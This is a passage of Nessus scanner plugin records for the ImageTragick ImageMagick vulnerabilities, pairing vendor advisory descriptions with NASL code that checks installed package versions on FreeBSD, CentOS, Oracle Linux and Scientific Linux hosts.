multiple vulnerabilities (0d724b05-687f-4527-9c03-af34d3b094ec) (ImageTragick)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Openwall reports :\n\nInsufficient filtering for filename passed to delegate's command\nallows remote code execution during conversion of several file\nformats. Any service which uses ImageMagick to process user-supplied\nimages and uses default delegates.xml / policy.xml, may be vulnerable\nto this issue.\n\nIt is possible to make ImageMagick perform a HTTP GET or FTP request\n\nIt is possible to delete files by using ImageMagick's 'ephemeral'\npseudo protocol which deletes files after reading.\n\nIt is possible to move image files to file with any extension in any\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\nimage.gif should exist in known location - /tmp/ for PoC (in real life\nit may be web service written in PHP, which allows to upload raw txt\nfiles and process images with ImageMagick).\n\nIt is possible to get content of the files from the server by using\nImageMagick's 'label' pseudo protocol.\"\n );\n # http://www.openwall.com/lists/oss-security/2016/05/03/18\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2016/05/03/18\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://imagetragick.com/\"\n );\n # https://vuxml.freebsd.org/freebsd/0d724b05-687f-4527-9c03-af34d3b094ec.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fafa51e6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick-nox11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick7-nox11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/06\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick<6.9.3.9_1,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick-nox11<6.9.3.9_1,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick7>=7.0.0.0.b20150715<7.0.1.0_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick7-nox11>=7.0.0.0.b20150715<7.0.1.0_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:57:08", "description": "An update for ImageMagick is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. 
A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. 
Before making any such adjustment, please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "type": "nessus", "title": "CentOS 6 / 7 : ImageMagick (CESA-2016:0726) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:centos:centos:ImageMagick", "p-cpe:/a:centos:centos:imagemagick-c%2b%2b", "p-cpe:/a:centos:centos:imagemagick-c%2b%2b-devel", "p-cpe:/a:centos:centos:ImageMagick-devel", "p-cpe:/a:centos:centos:ImageMagick-doc", "p-cpe:/a:centos:centos:ImageMagick-perl", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91020", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0726 and \n# CentOS Errata and Security Advisory 2016:0726 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91020);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"CentOS 6 / 7 : ImageMagick (CESA-2016:0726) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n 
script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. 
(CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-May/021865.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d280230\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-May/021866.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eefa6faa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3714\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:56:47", "description": "From Red Hat Security Advisory 2016:0726 :\n\nAn update for ImageMagick is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. 
(CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Before making any such adjustment, please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : ImageMagick (ELSA-2016-0726) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ImageMagick", "p-cpe:/a:oracle:linux:imagemagick-c%2b%2b", "p-cpe:/a:oracle:linux:imagemagick-c%2b%2b-devel", "p-cpe:/a:oracle:linux:ImageMagick-devel", "p-cpe:/a:oracle:linux:ImageMagick-doc", "p-cpe:/a:oracle:linux:ImageMagick-perl", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:0726 and \n# Oracle Linux Security Advisory ELSA-2016-0726 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91032);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", 
value:\"2022/05/03\");\n\n script_name(english:\"Oracle Linux 6 / 7 : ImageMagick (ELSA-2016-0726) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:0726 :\n\nAn update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. 
A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-May/006020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-May/006021.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-c++-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2022-03-27T14:55:33", "description": "Security Fix(es) :\n\n - It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. (CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. 
Before making any such adjustment, please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : ImageMagick on SL6.x, SL7.x i386/x86_64 (20160509) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:ImageMagick", "p-cpe:/a:fermilab:scientific_linux:imagemagick-c%2b%2b", "p-cpe:/a:fermilab:scientific_linux:imagemagick-c%2b%2b-devel", "p-cpe:/a:fermilab:scientific_linux:ImageMagick-debuginfo", "p-cpe:/a:fermilab:scientific_linux:ImageMagick-devel", "p-cpe:/a:fermilab:scientific_linux:ImageMagick-doc", "p-cpe:/a:fermilab:scientific_linux:ImageMagick-perl", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20160509_IMAGEMAGICK_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/91039", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, 